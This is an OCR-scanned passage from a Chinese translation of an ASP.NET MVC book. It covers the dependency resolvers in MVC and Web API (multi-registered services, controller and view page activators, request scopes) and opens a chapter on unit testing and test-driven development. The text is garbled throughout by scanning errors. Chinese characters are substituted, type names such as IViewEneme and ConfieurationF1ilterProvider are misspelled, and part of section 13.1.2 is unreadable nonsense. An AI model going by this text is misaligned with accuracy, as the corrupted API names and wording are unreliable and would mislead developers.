GetServices 方法 要 么 返回 一 个 在 解析 器 中 注册 的 服务 类 型 的 服务 对 象 集 ， 要 么 返回 一 
个 空 集 ( 如 条 解析 右 中 没有 注册 服务 类 型 的 话 )。 
当 列 出 ASPNET MVC 文 持 的 复合 注册 服务 时 ， 会 出 现 一 个 指定 的 标题 “multi-service 
model”， 它 有 两 个 可 选 值 : 
e Competitive services: 使 ASPNET MVC 框架 按 顺 序 执 行 服务 ,并 询问 服务 可 否 执 
行 其 主要 功能 。 啊 应 并 能 满足 请 求 的 第 一 个 服务 是 ASPNET MVC 使 用 的 服务 。 通 
常情 况 下 ，ASP.NET MVC 框架 是 对 请 求 控 个 询问 这 些 问 题 ， 因 此 ， 每 个 请 求实 际 
使 用 的 服务 可 能 是 不 一 样 的 。 视 图 引擎 服务 使 是 竞争 服 务 的 一 个 很 好 的 例子 : 在 一 
个 请 求 中 ， 只 有 单个 视图 引擎 泻 染 视图 。 

e Cooperative services: ASPNET MVC 框架 请 求 每 个 服务 执行 其 主要 功能 , 满足 请 
求 的 所 有 服务 就 会 协作 完成 操作 。 过 渡 提 供 如 便 是 协作 服务 很 好 的 一 个 例子 : 每 个 
提供 器 可 能 会 为 请 求 找到 一 个 过 小 融 ， 然 后 执行 提供 右 找 到 的 所 有 过 滤 右 。 

表 12-2 列举 了 MVC 使 用 的 复合 注册 服务 ， 并 指出 了 它们 之 间 的 莞 争 与 合作 关系 。 

表 12-2 MVC 中 的 复合 注册 服 
Service (Traditional Registration APIT) 
Default Service Implementations 
IFilterProvider (FilterProviders.Providers) 
Multi-service model: cooperative 
FilterAttributeFilterProvider 
GlobalFilterCollection 
ControllerInstanceFilterProvider 
IModelBinderProvider 
(ModelBinderProviders.BinderProviders) 


Multi-service model: competitive 


None 
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IViewEneme (ViewEnemnes.Enemes) 
Multi-service model: competitive 
WebFormViewEngme 
RazorViewEneme 
ModelValidatorProvider 
(ModelValidatorProviders.Providers) 
Multi-service model: cooperative 
DataAnnotationsModelValidatorProvider 
DataErrorInfoModelValidatorProvider 
ClientDataTypeModelValidatorProvider 
ValueProviderFactory 
(ValueProviderFactories.Factories) 
Multi-service model: competitive 
ChildActionValueProviderFactory 
FormValueProviderFactory 
JsonValueProviderFactory 
RouteDataValueProviderFactory 


QueryStrineValueProviderFactory 


HttpFileCollectionValueProviderFactory 


12.2.3 ”MVC 中 的 任意 对 象 


MVC 中 有 两 个 特殊 的 情形 。 在 这 两 个 情形 中 ，MVC 框架 请 求 一 个 依赖 解析 器 来 创建 
任意 对 象 ， 这 些 创 建 的 对 象 严格 来 说 不 是 服务 ， 而 是 控制 器 和 视图 页 面 。 

正如 在 前 面 看 到 的 ， 两 个 称 为 激活 器 的 服务 控制 着 控制 器 和 视图 页 面 的 实例 化 。 这 些 
激活 器 的 默认 实现 要 求 依 赖 解 析 器 创建 控制 器 和 视图 页 面 ， 如 果 失 败 ， 将 调用 Activator 
CreateImstance 方法 。 

1. 创建 控制 器 

如 果 以 前 编写 过 带 有 构造 图 数 ( 有 参数 ) 的 控制 希 ， 就 应 该 知道 在 运行 时 系统 会 有 一 个 异 
常 提示 :“ 该 对 象 未 定义 无 参 构 造 函 数 ”。 在 ASPNET MVC 应 用 程序 中 ， 如 果 我 们 仔细 查看 
该 异常 的 跟踪 栈 信 息 ， 就 会 发 现 它 既 包 含 DefaultControllerFactory， 也 包含 DefaultController- 


Activator。 


控制 融 工 厂 是 最 终 用 于 负责 将 控制 颖 名 称 转换 为 控制 费 对 象 的 ， 因 此 ， 是 控制 颖 工厂 
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使 用 的 IControllerActivator 接口 ， 而 不 是 MVC 本 喘 。 在 ASPNET MVC 中 ， 默 认 的 控制 
器 工厂 将 这 一 转换 过 程 分 为 单独 的 两 个 子 过 程 : 将 控制 嚣 名称 映射 为 类 型 以 及 将 类 型 实例 
化 为 对 象 。 其 中 后 一 步骤 由 控制 器 激活 器 负责 。 


自 定 义 控 制 器 工厂 和 控制 器 激活 器 

由 于 控制 器 工厂 最 终 负 责 将 控制 器 名 称 转换 为 控制 器 对 象 ， 因 此， 对 控制 器 工厂 所 做 
的 任何 替换 都 可 能 导致 控制 器 激活 絮 不 能 正常 工作 。 在 ASPNET MVC 3 之 前 的 版 本 中 ， 
还 没有 控制 器 激活 器 ， 所 以 为 ASPNET MVC 旧版 本 设计 的 任何 自 定义 控制 器 工厂 不 知道 
依赖 解析 器 和 控制 器 激活 器 。 因 此 ， 当 我 们 编写 新 的 控制 器 工厂 时 ， 应 该 尽 可 能 使 用 控制 


因为 玖 认 的 控制 硕 激 活 硕 只 要 求 依 赖 解 析 吉 为 我 们 创建 控制 项 ， 所 以 许多 依赖 注入 容 
右 日 动 地 为 控制 右 实 例 提供 依赖 注入 ， 这 是 因为 依赖 注入 容 右 被 要 求 创建 依赖 注入 。 如 果 
容 锅 在 没有 预先 配置 的 情况 下 能 够 创建 任意 对 象 ， 我 们 就 不 再 要 创建 控制 右 激 活 左 ， 而 只 
再 注册 依赖 注入 容 磺 束 行 了 。 

然而 ， 如 果 依 赖 注入 容器 不 能 创建 任意 对 象 ， 那 么 我 们 不 只 要 注册 依赖 注入 容器 ， 还 
要 实现 激活 器 。 这 就 使 容器 知道 目 己 可 能 被 要 求 创建 预先 不 知道 的 任意 类 型 ， 并 人 允许 采取 
任何 操作 以 确保 能 够 成 功 啊 应 创建 类 型 的 请 求 。 

控制 右 激 活 右 接口 只 包含 一 个 方法 ， 如 下 所 未: 

public interface IControllerActivator 

IController Create (RequestContext requestContext, Type 


controllerType); 
} 


除了 控制 器 类 型 ， 控 制 句 激活 器 还 可 以 访问 RequestContext， 其 中 包括 HttpContext( 包 
括 Session 和 Request) 和 路 由 映射 到 请 求 的 路 由 数据 。 由 于 激活 器 能 够 访问 上 下 文 信息 ， 因 
此 ， 我 们 可 能 选择 实现 控制 器 激活 器 来 帮助 决定 如 何 创 建 探 制 器 对 象 。 例 如 ， 激 活 器 根据 
登录 系统 的 用 户 是 不 是 管理 员 来 决定 创建 不 同 的 控制 器 类 。 

2. 创建 视图 


与 控制 融 激 活 颖 负责 创建 控制 右 实 例 一 样 ， 视 图 页 面 激活 器 负 贡 创建 视图 页 和 耐 实例 。 
同样 ， 因 为 这 些 创 建 的 类 型 可 能 是 依赖 注入 没有 预先 配置 的 任意 类 型 ， 因 此 ， 激 活 器 给 容 
需 一 个 知 着 请 求 视 图 的 机 会 。 

视图 激活 器 接口 与 控制 费 激 活 费 接口 类 似 ， 代 人 码 如 下 : 

public interface IViewPageActivator 

{ 


object Create (ControllerContext controllerContext, Type type}); 
} 
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这 种 情形 下 ， 视 图 页 面 激活 器 可 访问 ControllerContext， 其 中 不 仅 包 含 RequestContext 
和 HttpContext， 还 包括 对 控制 器 、 模 型 、 视 图 数据 、 临 时 数据 和 当前 控制 器 状态 的 其 他 信 
县 的 访问 。 

与 控制 器 激活 器 一 样 ， 视 图 页 面 激活 器 也 是 ASPNET MVC 框架 间接 使 用 的 类 型 。 在 
该 情形 中 ， 是 BuildManagerViewEngine( 即 WebFormViewEnegine 和 RazorViewEngine 的 抽 
象 基 类 ) 使 用 视图 页 面 激活 器 。 

视图 引擎 的 主要 任务 是 把 视图 的 名 称 转换 为 视图 实例 。ASPNET MVC 框架 把 视图 页 
面 对 象 的 实际 实例 化 任务 分 配给 视图 激活 器 ， 而 把 正确 视图 文件 的 标识 以 及 这 些 文件 的 编 
译 工 作 留 给 创建 管理 器 的 视图 引擎 基 类 。 


ASP.NET 的 创建 管理 器 

将 视图 编译 成 类 的 过 程 主要 由 核心 ASPNET 运行 时 系统 中 一 个 称 为 BuildManasger 的 
组 件 负 责 。 该 组 件 具有 很 多 功能 ， 其 中 包 插 将 后 级 名 为 .aspx 和 .ascx 的 文件 转换 成 Web 
Forms 应 用 程序 使 用 的 类 。 

创建 管理 器 系统 是 可 扩展 的 , 与 ASPNET 核心 运行 时 系统 一 样 , 我 们 可 以 利用 它 的 编 
译 模型 将 应 用 程序 中 的 输入 文件 编译 成 运行 时 的 类 。 事 实 上 ，ASPNET 核心 运行 时 系统 并 
不 了 解 Razor; 之 所 以 能 够 将 后 级 名 为 .cshtml 和 .vbhtml 文件 编译 成 类 , 是 因为 ASPNET Web 
Pages 团队 编写 了 一 个 称 为 “创建 提供 器 ”的 创建 管理 器 扩展 。 

完成 这 一 功能 的 第 三 方 类 库 的 例子 是 早期 发 布 的 Subsonic 项 目 ， 一 个 由 Rob Conery 
编写 的 对 象 关 系 映 射 器 (Object-Relational Mapper，ORM)。 在 这 种 情形 下 ，SubSonic 使 用 
一 个 描述 映射 数据 库 的 文件 ， 在 运行 时 ， 它 再 生成 目 动 匹 配 数 据 库 表 的 ORM 类 。 

在 Visual Studio 中 设计 应 用 程序 时 , 创建 管理 器 就 在 运行 。 因此， 当 编 写 应 用 程序 时 ， 
能 够 进行 任何 编译 ， 其 中 包括 Visual Studio 中 的 智能 感知 支持 。 


12.3 Web API 中 的 依赖 解析 


新 添加 的 Web API 功能 (请 参阅 第 11 章 ) 也 支持 依赖 解析 。Web API 中 的 依赖 解析 器 在 
设计 上 与 MVC 的 稍 有 不 同 ， 但 在 原则 上 ， 它 们 的 目标 是 一 致 的 : 都 能 够 让 开发 人 员 轻 松 
地 获取 控制 器 的 依赖 注入 ， 同 时 使 得 向 Web API 提供 服务 变 得 简单 ， 这 里 的 Web API 是 指 
通过 依赖 注入 技术 自 创 建 的 。 

Web API 的 依赖 解析 在 实现 中 有 两 个 显著 差异 。 首 先 ， 没 有 为 服务 默认 注册 的 静态 API; 
由 于 历史 原因 ， 仍 然 保 留 MVC 中 的 旧 静 态 API。 取 而 代 之 的 是 一 种 松散 类 型 的 服务 定位 
堪 ， 我 们 可 以 通过 HttpConfiguration.Services 访问 ， 这 样 我 们 列举 或 使 用 Web API 奉 换 默 
认 的 服务 。 

第 二 ， 实 际 的 依赖 解析 器 API 已 经 稍微 修改 ， 以 支持 范围 scopes) 这 一 概念 。MVC 中 
原来 的 依赖 解析 器 的 一 个 不 足 之 处 是 缺乏 资源 清理 机 制 。 与 委员 会 协商 之 后 ， 我 们 制定 了 
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-个 设计 方案 ,使 用 范围 的 概念 作为 Web API 触发 清理 机 制 的 方式 。 对 每 次 请 求 ， 系 统 目 动 
创建 一 个 新 范围 ， 这 个 范围 可 以 通过 HttpRequestMessage 的 扩展 方法 GetDependencyScope 
来 获取 。 与 依赖 解析 器 接口 一 样 ， 范 围 接口 既 有 GetService 方法 也 有 GetServices 方法 ; 区 
别 是 从 请 求 本 地 获取 的 资源 在 请 求 完成 时 会 被 释放 。 

可 通过 HttpConfiguration.DependencyResolver， 从 Web API 获取 或 者 为 Web API 设置 
依赖 解析 器 。 


12.3.1 Web API 的 单一 注册 服务 


与 MVC 一 样 ，Web API 也 有 其 本 身 使 用 的 服务 ， 用 户 只 能 注册 一 个 这 种 服务 实例 。 
解析 器 通过 调用 GetService 可 以 检索 这 些 单一 注册 服务 。 

对 于 所 有 的 单一 注册 服务 ， 在 第 一 次 使 用 时 ，Web API 都 会 调用 依赖 解析 器 ， 并 把 返 
回 的 结果 绥 存 起 来 ， 以 使 应 用 程序 在 其 生命 周期 中 继续 使 用 。 当 不 能 在 解析 器 中 找到 服务 
时 ，Web API 就 使 用 HttpConfiguration.Services 提供 的 默认 服务 列表 中 的 服务 。 表 12-3 列 
出 了 Web API 使 用 的 单一 注册 服务 。 


表 12-3 Web API 中 的 单一 注册 服务 


服务 默认 服务 实现 
LActionValueBinder DefaultActionValueBinder 
LApiExplorer AplExplorer 
LAssembliesResolver DefaultAssembliesResolver™* 
IBodyModelValidator DefaultBodyModelValidator 
IContentNegotiator DefaultContentNeeotiator 
IDocumentationProvider None 
IHostBufferPolicySelector None 
IHttpActionInvoker ApiControllerActionInvoker 
IHttpActionSelector ApiControllerActionSelector 
IHttpControllerActivator DefaultHttpControllerActivator 
IHttpControllerSelector DefaultHttpControllerSelector 
IHttpControllerTypeResolver DefaultHttpControllerTypeResolver™** 
llraceManager TraceManager 
ITraceWriter None 
ModelMetadataProvider CachedDataAnnotationsModel- 

MetadataProvider 


* 当 应 用 程序 在 ASPNET 中 运行 时 ， 替 换 为 WebHostAssembliesResolver。 
#*# 当 应 用 程序 在 ASPNET 中 运行 时 ， 替 换 为 WebHostHttpControllerTypeResolver。 
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12.3.2 Web API 中 的 复合 注册 服务 


复合 注册 服务 也 是 从 MVC 借用 的 概念 ，Web API 拥有 多 种 注册 服务 ， 并 且 可 以 把 依 
赖 解析 器 中 列举 的 服务 和 HttpConfiguration.Services 的 服务 结合 起 来 。Web API 可 以 调用 
GetServices 方法 来 从 依赖 解析 器 中 检索 服务 。 表 12-4 列举 了 Web API 使 用 的 复合 注册 服 
务 ， 并 指出 了 这 些 服务 之 间 的 合作 或 竞争 关系 。 


表 12-4 Web API 中 的 复合 注册 服务 


服务 
默认 服务 实现 

IFilterProvider 

Multi-service model: cooperative 
ConfieurationF1ilterProvider 
ActionDescriptorFilterProvider 

ModelBinderProvider 

Multi-service model: competitive 
TypeConverterModelBinderProvider 
TypeMatchModelBmderProvider 
KeyValuePalrModelBinderProvider 
ComplexModelDtoModelBinderProvider 
ArrayModelBinderProvider 
DictionaryModelBInderProvider 
CollectionModelBinderProvider 
MutableObjectModelBinderProvider 

ModelValidatorProvider 

Multi-service model: cooperative 
DataAnnotationsModelValidatorProvider 
DataMemberModelValidatorProvider 
InvalidModelValidatorProvider 

ValueProviderFactory 

Multi-service model: competitive 
QueryString ValueProviderFactory 


RouteDataValueProviderFactory 
12.3.3 Web API 中 的 任意 对 象 
存在 有 三 种 情况 ，Web API 框架 需要 请 求 依赖 解析 器 来 创建 任意 对 象 ， 也 就 是 ， 那 些 
从 严格 意义 上 说 不 是 服务 的 对 象 。 与 MVC 一 样 ， 控 制 器 也 是 这 种 类 型 的 对 象 。 另 外 两 种 
情形 是 ， 用 [ModelBinder] 特 性 添加 的 模型 绑 定 右 ， 以 及 通过 [HttpControllerConfiguration] 
附加 到 控制 各 的 服务 。 
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与 内 首 的 服务 一 样 ， 通 过 特性 添加 的 服务 会 在 应 用 程序 的 生命 周期 中 绥 存 起 来 ， 这 样 
Web API 束 可 以 从 添加 到 配置 中 的 依赖 解析 堪 请 求 这 些 服 务 。 从 另 一 方面 来 讲 ， 控 制 器 通 
党 有 请 求 范 围 的 生命 期 ， 这 样 我 们 就 可 以 从 附加 到 请 求 中 的 范围 来 获取 。 


12.3.4 对 比 MVC 和 Web API 中 的 依赖 解析 器 


虽然 MVC 和 Web API 都 拥有 依赖 解析 器 ,但 正如 前 面 介绍 的 ， 它 们 的 接口 是 存在 区 
别 的 。 男 外 ， 由 于 MVC 和 Web API 没有 公共 服务 接口 ， 因 此 ， 包 含 在 这 些 依赖 解析 颖 中 
的 服务 是 不 同 的 。 这 就 意味 者 ， 两 个 依赖 解析 器 接口 的 实现 是 不 同 的 ， 因 此 ， 不 要 期 望 
MVC 依赖 解析 器 能 够 在 Web API 中 工作 ， 反 之 亦 然 。 

这 样 同一 个 具体 的 依赖 解析 器 容 强 拥有 两 种 依赖 解析 费 接 口 实 现 版 本 就 非常 合 情 合 
理 , 因为 这 样 我 们 在 整个 应 用 程序 中 使 用 的 自 定义 服务 都 能 访问 MVC 和 Web API 控制 句 。 
我 们 可 以 三 阅 依赖 注入 容 费 文档 来 学 习 如 何在 一 个 包含 MVC 和 Web API 的 应 用 程序 中 使 
用 单一 容器 。 


12.4 小结 
ASPNET MVC 和 Web API 的 依赖 解析 器 为 Web 应 用 程序 中 的 依赖 注入 提供 了 一 些 令 


人 振奋 的 新 机 过 。 利 用 它 不 仅 可 以 降低 应 用 程序 设计 的 厢 合 程度 ， 还 可 以 使 应 用 程序 具有 
更 好 的 可 插 拔 性 ， 从 而 使 应 用 程序 的 开发 变 得 更 加 灵活 和 强大 。 
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本 章 主要 内 容 

e 理解 单元 测试 和 测试 驱动 开发 

e 创建 单元 测试 项 目 

。 在 ASP.NET MVC 应 用 程序 中 应 用 单元 测试 时 的 一 些 忠 告 


在 开发 可 测试 软件 的 过 程 中 ， 单 元 测试 已 成 为 确保 软件 质量 的 一 个 不 可 或 缺 部 分 。 大 
部 分 专业 开发 人 员 在 他 们 的 日 党 工作 中 都 有 目 己 的 一 套 单 元 测试 方法 。 测 试 驱 动 开 发 
(Test-Driven Development，TDD) 是 编写 单元 测试 的 一 种 方法 ， 采 用 该 方法 的 开发 人 员 在 编 
写 任 何 产品 代码 之 前 都 需要 编写 测试 程序 。TDD 允许 开发 人 员 以 系统 的 方式 完善 软件 设 
计 ， 从 而 可 以 有 效 地 提高 单元 测试 的 质量 ， 增 加 回归 测试 市 来 的 好 处 。ASPNET MVC 使 
用 单元 测试 来 编写 。 本 章 重 点 讲解 单元 测试 (特别 是 TDD) 在 ASPNET MVC 中 的 应 用 。 

考虑 到 有 些 读者 没有 用 过 单元 测试 和 TDD， 本 章 包 含 了 一 个 对 单元 测试 和 TDD 的 简 
短 介绍 ， 作 为 在 实践 中 深层 次 学 习 单 元 测试 和 TDD 的 基础 。 单 元 测试 是 一 个 非常 宽泛 的 
主题 。 关 于 它 和 TDD 的 简 短 介绍 可 以 作为 入 门 导 引 ， 来 帮助 明确 它们 是 不 是 我 们 想 进 一 
步 学 习 和 研究 的 内 容 。 

在 本 书 之 前 的 版 本 中 ， 单 元 测试 章节 通常 重点 介绍 单元 测试 的 工作 机 制 ， 并 附 有 大 量 
的 示例 代码 。 这 里 我 们 决定 把 重点 转移 到 讲解 一 些 实 用 技巧 ， 以 及 这 些 技巧 在 ASPNET 
MVC 应 用 程序 单元 测试 的 具体 场合 中 的 应 用 。 本 章 后 半 部 分 对 于 从 事 过 单元 测试 开发 ， 
并 且 想 从 目 己 的 设计 中 学 习 提 高 的 开发 人 员 非 常 有 用 。 


元 疯 试 和 测试 驱动 开 友 的 意义 


当 我 们 谈 到 软件 测试 时 ， 通常 是 指 进行 的 一 系列 不 同 种 类 的 测试 ， 包括 单元 测试 、 验 收 
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测试 (acceptance testing)、 探 索 测 试 (exploratory testing)、 性 能 测试 (performance testing) 和 可 扩 
展 性 测试 (scalability testing) 等 。 对 单元 测试 有 一 个 共同 的 理解 是 学 好 本 章 内 容 的 一 个 良好 
基础 ， 也 是 本 万 的 主题 。 


13.1.1 单元 测试 的 定义 


大 部 分 开发 人 员 都 接触 过 单元 测试 ， 并 且 都 有 一 套 适 用 于 自己 的 最 好 方式 。 根 据 笔 者 
经 验 ， 大 部 分 成 功 的 单元 测试 应 用 通常 具有 以 下 4 个 特点 : 

e 测试 小 部 分 产品 代码 (“ 单 元 ”) 

e 产品 代码 分 块 隔离 测试 

e 只 测试 公共 端点 

e 运行 测试 程序 能 够 得 到 目 动 的 结果 : pass/fail 

上 面 的 每 个 规则 以 及 它们 如 何 影响 单元 测试 的 编写 方式 将 在 下 面 介 绍 。 


1. 测试 小 部 分 代码 


当 编 写 单元 测试 时 , 我 们 经 党 查找 能 够 合理 测试 的 最 小 功能 片段 。 在 像 C# 一 样 的 面 问 
对 和 象 编程 语言 中 ， 类 通常 就 意味 看 是 最 小 的 功能 片段 ， 但 大 多 数 情 况 下 ， 我 们 测试 的 是 类 
中 的 一 个 方法 。 测 试 小 片段 代码 能 使 我 们 快速 地 编写 出 简单 的 测试 程序 。 测 试 程 序 需要 简 
单 且 容易 理解 ， 以 便 我 们 能 够 精确 地 验证 编写 的 测试 程序 是 否 符合 要 求 。 

源 代码 的 阅读 次 数 要 远 超过 编写 次 数 ， 这 一 点 在 单元 测试 中 特别 有 用 ， 因 为 单元 测试 
要 测试 软件 的 期 望 规则 和 行为 。 当 单元 测试 失败 时 ， 开 发 人 员 应 该 能 够 快速 地 阅读 测试 程 
序 ， 理 解 什 么 出 错 了 ， 以 及 为 什么 会 出 错 ， 从 而 能 够 快速 地 知道 如 何 修正 出 错 的 地 方 。 使 
用 小 的 测试 程序 来 测试 小 片段 代码 能 够 极 大 地 改善 测试 结果 的 可 理解 性 。 

2. 隔离 测试 


单元 测试 的 另 一 个 重要 方面 就 是 它 还 应 该 能 够 在 问题 出 现时 精确 地 指出 问题 出 现 的 
位 置 。 编 写 代码 测试 小 功能 片段 是 单元 测试 的 一 个 重要 方面 ， 但 不 是 全 部 。 我 们 还 需要 把 
测试 的 代码 与 和 它 有 交互 的 复杂 代码 隔离 ， 以 确保 出 现 的 故障 一 定 是 在 测试 代码 中 ， 而 不 
是 在 与 其 交互 的 代码 中 。 检 查 交 互 的 合作 代码 是 否 存 在 bug 是 合作 代码 单元 测试 的 任务 。 

隔离 测试 还 有 一 个 优点 就 是 与 要 测试 的 程序 交互 的 代码 不 要 求 必须 存在 。 这 对 于 拥有 
多 个 开发 人 员 的 团队 开发 非常 有 用 ;一 些 团队 可 能 处 理 交 互 功能 片段 ， 而 另外 一 些 团队 可 
能 同时 进行 其 他 功能 片段 的 处 理 ， 从 而 实现 项 目的 并 行 开发 。 隔离 地 测试 组 件 不 仅 可 以 在 
其 他 组 件 编写 完毕 之 前 进行 ， 也 可 以 帮助 我 们 更 好 地 理解 组 件 之 间 的 交互 原理 ， 从 而 在 整 
合 组 件 之 前 捕获 这 些 可 能 出 现 的 错误 。 

3. 只 测试 公共 端点 


许多 刚 开 始 使 用 单元 测试 的 开发 人 员 在 修改 类 的 内 部 实现 时 ， 通 常 感到 很 痛苦 。 对 代 
码 的 一 点 儿 修改 就 可 能 会 导致 多 个 单元 测试 的 失败 。 因 此 ， 在 修改 产品 代码 时 ， 维 护 这 
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些 单元 测试 的 开发 人 员 通 常 感到 很 池 表 ， 之 所 以 会 这 样 ， 是 因为 单元 测试 对 它 要 测试 的 类 
的 工作 原理 了 解 太 多 。 

当 编 写 单元 测试 时 ， 如 果 仅 局 限于 产品 的 公共 请 点 (一 个 组 件 的 集成 点 )， 就 可 以 将 单 
元 测试 与 组 件 的 许多 内 部 实现 细节 相 隅 离 。 这 样 ， 修 改 实现 细节 束 不 会 经 币 性 地 破坏 我 们 
已 经 编写 好 的 单元 测试 了 。 


4. 自动 结果 


如 果 对 每 一 小 段 代 码 编写 测试 程序 ， 显 而 易 见 ， 最 终 我 们 将 会 编写 很 多 单元 测试 。 为 
了 充分 发 挥 单元 测试 的 效用 ， 我 们 将 在 应 用 程序 开发 的 过 程 中 频繁 地 运行 测试 程序 以 确保 
新 编写 的 代码 不 影响 已 有 的 功能 。 如 果 测 试 过 程 不 是 自动 的 ， 这 将 会 损耗 开发 人 员 的 大 部 
分 精力 ， 甚 至 变 成 开发 人 员 极 力 回 避 的 过 程 。 另 一 个 重要 方面 是 ， 单 元 测试 的 结果 是 简单 
的 pass/fail 判断 ， 单 元 测试 结果 不 应 该 对 解释 程序 开放 。 

为 了 获得 自动 过 程 ， 开 发 人 员 通 常 使 用 单元 测试 框架 。 该 框架 允许 开发 人 员 使 用 自己 
最 擅长 的 编程 语言 和 开发 环境 编写 测试 程序 ， 然 后 创建 pass/fail 规则 集 ， 框 架 可 以 根据 创 
建 的 这 些 规则 判定 测试 是 否 成 功 。 单元 测试 框架 中 通常 有 一 个 称 为 运行 程序 (runner) 的 小 软 
件 ， 可 用 来 在 项 目 中 查找 和 执行 单元 测试 。 系 统 中 存在 很 多 这 样 的 软件 ， 一 些 集成 到 了 
Visual Studio 中 ， 一 些 要 从 命令 行 运行 ， 而 其 他 一 些 集成 到 了 GUI 中， 甚至 还 有 一 些 集成 
到 了 自动 创建 工具 中 ， 像 脚本 创建 工具 和 上 自动 创建 服务 器 工具 等 。 


5. 单元 测试 一 一 软件 质量 的 保证 


许多 开发 人 员 之 所 以 选择 编写 单元 测试 ， 是 因为 单元 测试 可 以 提高 他 们 开发 软件 的 质 
量 。 在 这 种 情形 下 ， 虽 元 测试 主要 作为 软件 硕 量 保障 机 制 来 保证 开 及 软件 的 硕 量 ， 因 此 ， 

通常 情况 下 ， 开 发 人 员 首 先 编写 产品 代码 ， 而 后 编写 单元 测试 。 开 发 人 员 根 据 产品 代码 和 
预期 的 最 终 用 户 行 为 来 创建 测试 列表 ， 以 确保 产品 代码 按 计划 执行 。 

但 是 ， 在 产品 代码 之 后 编写 测试 程序 存在 一 些 弱 点 。 开 发 人 员 很 容易 遗漏 一 些 产品 代 
伺 ， 特 别 是 在 编写 了 产品 代码 之 后 很 长 一 段 时 间 再 编写 单元 测试 时 。 开 友人 员 在 单元 测试 
的 最 后 部 分 花费 数 天 或 数 周 时 间 编 写 产 品 代码 的 情况 也 是 常见 的 ， 并 且 还 需要 一 个 非常 认 
真 的 人 来 保证 产品 代码 的 每 一 个 执行 路 径 都 有 合适 的 单元 测试 进行 测试 。 糟 糕 的 是 ， 经 过 
数 周 编码 之 后 ， 开 发 人 员 想 编写 过 多 的 产品 代码， 而 不 停 下 来 编写 单元 测试 。 而 测试 驱动 
开发 可 以 有 效 地 弥补 这 些 不 足 。 


13.1.2 测试 驱动 开发 的 定义 


Ce 然 
re en tetris ne 一 样 
， 产 品 代码 以 及 用 来 描述 产品 代码 行为 的 单元 测试 ， 一 起 用 来 阻止 行为 回归 。 如果 两 才 
ak epee gpa Mra tant gl rgde 
的 产品 代码 。 
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当 我 们 说 把 单元 测试 作为 质量 保障 机 制 时 ， 主 要 指 的 是 减少 软件 中 的 漏洞 。TDD 可 以 
实现 这 一 目标 ， 但 这 并 不 是 它 的 主要 目标 ， TDD 的 主要 目标 是 提高 软件 设计 的 质量 。 通 过 
首先 编写 单元 测试 ， 我 们 可 以 在 编写 任何 产品 代码 之 前 描述 想 要 组 件 执行 的 操作 。 由 于 还 
没有 产品 代码 的 详细 实现 ， 因 此 ， 我 们 不 会 将 精力 放 到 产品 代码 的 任何 具体 实现 上 。 单 元 
测试 并 不 是 要 偷 规 产品 代码 的 内 部 结构 ， 而 是 变 成 产品 代码 的 消费 者 ， 以 便 与 协作 组 件 几 
平一 样 的 方式 来 使 用 它 。 这 些 测试 通过 变 成 API 的 第 一 批 用 户 来 修正 组 件 的 API。 


1. 红 / 绿 周期 


我 们 仍 遵循 前 面 为 单元 测试 设置 的 指导 原则 : 编写 小 段 代 码 、 隔 离 测 试 和 自动 执行 测 
试 。 由 于 首先 编写 测试 程序 ， 因 此 当 使 用 TDD 时 ， 我 们 经 常会 进入 一 个 周期 步骤 : 

(1) 编写 一 个 单元 测试 。 

(2) 运行 单元 测试 ， 得 到 fail 结果 (因为 尚未 编写 测试 代码 )。 

G3) 编写 足够 的 产品 代码 ， 通 过 单元 测试 。 

(4) 重新 运行 单元 测试 程序 ， 得 到 pass 结果 。 

重复 以 上 步骤 ， 直 到 产品 代码 编写 完毕 为 止 。 由 于 大 部 分 的 单元 测试 框架 用 红色 的 文 
本 /UI 元 素 表示 失败 的 测试 ， 用 绿色 的 文本 /UI 元 素 表示 通过 的 测试 ， 因 此 ， 这 个 周期 称 为 
红 / 绿 周期 (red/green cycle)。 在 这 个 过 程 中 勤奋 是 很 重要 的 。 除 非 某 个 单元 测试 失败 ， 否 则 
就 不 要 编写 任何 新 的 产品 代码 。 请 记 住 , 测试 一 旦 通过 , 我 们 就 不 要 再 编写 新 的 产品 代码 ( 除 
非 有 一 个 新 的 单元 测试 失败 )。 当 按 正 常 执 行 时 ， 这 就 会 告知 我 们 停止 编写 新 的 产品 代码 。 
编写 足够 的 产品 代码 通过 测试 ， 然 后 停止 编写 代码 ;如果 想 继续 编写 ， 就 需要 在 男 一 个 测 
试 中 描述 想 要 实现 的 新 行为 。 这 不 仅 给 我 们 提供 了 后 来 的 没有 描述 功能 的 故障 质量 益处 ， 
也 给 了 我 们 一 定时 间 去 考虑 是 否 真 的 需要 新 功能 ， 并 决定 添加 该 新 功能 

当 修复 故障 时 ， 我 们 也 使 用 同样 的 步骤 方法 。 我 们 可 能 需要 通过 反复 调试 代码 来 发 现 
故障 的 性 质 ， 但 一 旦 知道 了 故障 的 性 质 ， 就 可 以 编写 描述 期 望 行为 的 单元 测试 ， 运 行 测 试 
程序 ， 失 败 ， 然 后 修改 产品 代码 以 更 正 错 误 。 我 们 可 以 利用 已 有 的 单元 测试 ， 来 帮助 确保 
所 做 的 修改 没有 破坏 任何 已 有 的 期 望 功 能 。 


2. 重 构 


按照 这 里 描述 的 模式 ， 代 人 码 的 细微 改变 可 能 束 会 导致 代 人 码 的 大 片 修改 ， 从 而 使 代码 凌 

乱 不 堪 。 当 测试 通过 的 时 候 ， 我 们 就 应 该 停止 编写 产品 代码 ， 那 么 此 时 如 何 消 除 代 人 码 的 细 
微 修改 所 市 来 的 代码 混乱 呢 ? 管 案 是 重 构 。 

“ 重 构 ”一 词 具有 多 种 意义 ， 但 这 里 的 重 构 是 指 在 不 改变 产品 代码 外 部 可 见 功能 的 情 

况 下 ， 修 改 产 品 代 人 码 实 现 细 节 的 过 程 。 这 也 是 当 通 过 所 有 的 单元 测试 时 ， 我 们 在 实际 应 用 

中 所 采用 的 过 程 。 在 重 构 和 更 新 产品 代码 的 过 程 中 ， 单 元 测试 应 该 能 够 继续 通过 。 在 重 构 

时 不 要 修改 任何 单元 测试 程序 ， 如 果 要 求 必 须 修改 单元 测试 ， 我 们 则 要 按照 “ 红 / 绿 周期 ” 

-市 讲解 的 编写 单元 测试 程序 的 步骤 来 瀛 加、 删除 或 改变 功能 。 切 勿 同时 修改 测试 程序 和 
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产品 代码 。 因 此 更 确切 地 说 ， 重 构 是 一 种 机 制 ， 也 可 以 说 是 在 不 破坏 单元 测试 程序 的 情况 
下 ， 构 建 结 构 化 代码 的 过 程 。 


3. 采用 Arrange、Act、Assert 结构 化 测试 


本 书 中 单元 测试 的 许多 例子 都 遵照 一 个 称 为 “Arrange、Act、Assert” 的 结构 (有 时 缩 
